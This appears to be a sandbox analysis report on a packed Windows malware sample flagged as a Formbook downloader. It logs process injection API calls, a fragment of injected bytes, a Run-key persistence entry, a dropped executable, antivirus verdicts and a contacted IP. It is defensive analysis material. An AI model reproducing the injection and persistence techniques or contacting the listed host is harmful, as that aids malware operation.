NtProtectVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 5 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000 process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 5 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000 process_handle: 0xffffffff		3221225496

Creates executable files on the filesystem (1 event)

file	C:\Users\Public\Ewzmyh.exe

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 81920 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x005d1000 process_handle: 0xffffffff	1	0	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00090800', u'virtual_address': u'0x00055000', u'entropy': 7.088598369076402, u'name': u'.data', u'virtual_size': u'0x000907f4'}

entropy

7.08859836908

description

A section with a high entropy has been found

entropy

0.594650205761

description

Overall entropy of this PE file is high

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 63ffbfe09d225ad6a80a6ca651b740a0fb900f09

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2664 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000052c	1
NtAllocateVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000052c	1
NtAllocateVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000052c	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Ewzmyh

reg_value

C:\Users\Public\hymzwE.url

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2364 created a remote thread in non-child process 2664
CreateRemoteThread Oct. 21, 2021, 6:42 p.m.	thread_identifier: 2116 process_identifier: 2664 function_address: 0x000c0000 flags: 0 stack_size: 0 parameter: 0x000b0000 process_handle: 0x0000052c	1	1332	0

Manipulates memory of a non-child process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2364 manipulating memory of non-child process 2664
NtAllocateVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2664 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000052c	1	0	0
NtAllocateVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000052c	1	0	0
NtAllocateVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000052c	1	0	0

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2364 injected into non-child 2664
WriteProcessMemory Oct. 21, 2021, 6:42 p.m.	buffer: HràÔIr base_address: 0x000b0000 process_identifier: 2664 process_handle: 0x0000052c	1	1	0
WriteProcessMemory Oct. 21, 2021, 6:42 p.m.	buffer: UìÄøEUøPUü1ÀPjÿuøÿUüYY]Â@UìÄÔSVWúðEÔTLùèQúþÿ3ÀUhÅTùdÿ0d ÆEÿG<ÇEô»rÃj@h0Eô@PPEô@4ÃPè4ÿÿEð}ðt0hjEðPè+ÿÿj@h0Eô@PPEô@4ÃPVèÿÿEð}ðuûtvEÔPÏUðÆèEÔÀt7EèUàUìUøRUØRPEðPVèúÿÿjjMèºSùÆè_ýÿÿÀtÆEÿ3ÀZYYdhÌTùEÔTLùè$úþÿÃ base_address: 0x000c0000 process_identifier: 2664 process_handle: 0x0000052c	1	1	0

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
McAfee	Artemis!43C4F31951DF
Cylance	Unsafe
Cybereason	malicious.921ee8
APEX	Malicious
Paloalto	generic.ml
Kaspersky	UDS:Trojan-Downloader.Win32.Formbook.gen
Avast	FileRepMalware
McAfee-GW-Edition	BehavesLike.Win32.AdwareDealPly.dc
Sophos	Generic ML PUA (PUA)
Ikarus	Trojan.Inject
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
BitDefenderTheta	Gen:NN.ZelphiCO.34218.8KW@aCXAGQmi
SentinelOne	Static AI - Suspicious PE
eGambit	Unsafe.AI_Score_99%
Fortinet	W32/Injector.EQAC!tr
AVG	FileRepMalware
MaxSecure	Trojan.Malware.300983.susgen

Network activity contains more than one unique useragent (2 events)

process	vbc.exe				useragent	lVali
process	vbc.exe				useragent	aswe

Uses Sysinternals tools in order to add additional command line functionality (1 event)

cmdline

C:\Windows\System32\mobsync.exe

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

114.95.162.70:80

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All